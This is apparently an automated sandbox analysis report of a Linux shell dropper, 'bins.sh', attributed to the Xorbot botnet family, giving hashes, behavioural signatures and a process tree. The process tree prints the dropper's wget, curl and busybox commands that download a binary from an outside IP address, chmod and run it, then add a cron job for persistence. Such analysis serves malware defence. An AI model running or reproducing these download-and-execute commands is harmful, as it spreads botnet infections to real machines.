Analysis
-
max time kernel
139s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
30-11-2024 18:12
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ec0ffe14fe481a8c4f08e2dd622a8fb3
-
SHA1
966e9859553fbe5400c8eba0f02018b78f434149
-
SHA256
6f8f9e04cd9bc383e8a1c96b8b0c648aedc109e7783fb213532c4ce4ff1622e6
-
SHA512
73a6817a4345934e3d0ccb4e464d1270255fa4cfc0dd70797f97e0145e2a9b02c2bb68443fd3d29f6caaa50d391ede9391e360bce3990576ce084d9c06ef376a
-
SSDEEP
96:cNpnbyyvRn3n6epNYYWBl+bTX7WzWHW3WsWEWAeTDHeTDHwWzWHW3WsWEWVQyYnR:cNpnbyyvTRbTX6jjNpnbyyXB
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 1502 chmod -
Executes dropped EXE 1 IoCs
Processes:
4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dIioc pid Process /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI 1503 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI -
Renames itself 1 IoCs
Processes:
4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dIpid Process 1504 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.jIEAjz crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dIdescription ioc Process File opened for reading /proc/1131/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1241/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/13/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/169/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/468/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/477/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1071/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/633/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1066/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/11/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/21/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/34/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/545/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1496/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/715/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1119/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1127/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/16/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/26/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/32/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/179/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/207/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1135/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1176/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1516/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/81/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/164/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1268/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1289/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1305/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/24/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/464/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/516/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1049/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1196/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1485/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/908/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/3/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/8/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/10/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/15/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/35/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/425/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1123/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1252/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1482/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/172/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/680/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/722/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/4/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/6/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/9/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/12/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/30/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1109/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1236/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1288/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1329/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/82/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/322/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/562/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/673/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI File opened for reading /proc/1024/cmdline 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc Process File opened for modification /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI wget File opened for modification /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI curl File opened for modification /tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1485
-
/bin/rm/bin/rm bins.sh2⤵PID:1488
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI2⤵
- Writes file to tmp directory
PID:1489
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI2⤵
- Writes file to tmp directory
PID:1500
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI2⤵
- Writes file to tmp directory
PID:1501
-
-
/bin/chmodchmod 777 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI2⤵
- File and Directory Permissions Modification
PID:1502
-
-
/tmp/4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI./4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1503 -
/bin/shsh -c "crontab -l"3⤵PID:1505
-
/usr/bin/crontabcrontab -l4⤵PID:1506
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1507
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1508
-
-
-
-
/bin/rmrm 4swaXrCwk6ACeEPXGaNLWX3FzlIIyVI1dI2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cVce6bqJ4q09lI5P35ZV9hhvD7nkFIxhb2⤵PID:1520
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
210B
MD5d1bb77c9f69ce172be0d41366f67c75e
SHA1e49f478755ada5c272e9bbbb087af42a88aa944a
SHA256a56cc5a9a776a65c41d1706685a30cc2feb7d7e4be7371f4fd399e7eff66596c
SHA512793742c979bfb313f6314f5392126230ceef5bf0546a957924516d4d2418b649f2761b7a2d549690be5006a27710c3833fd293a12bdc82e4a2eea5248ff54838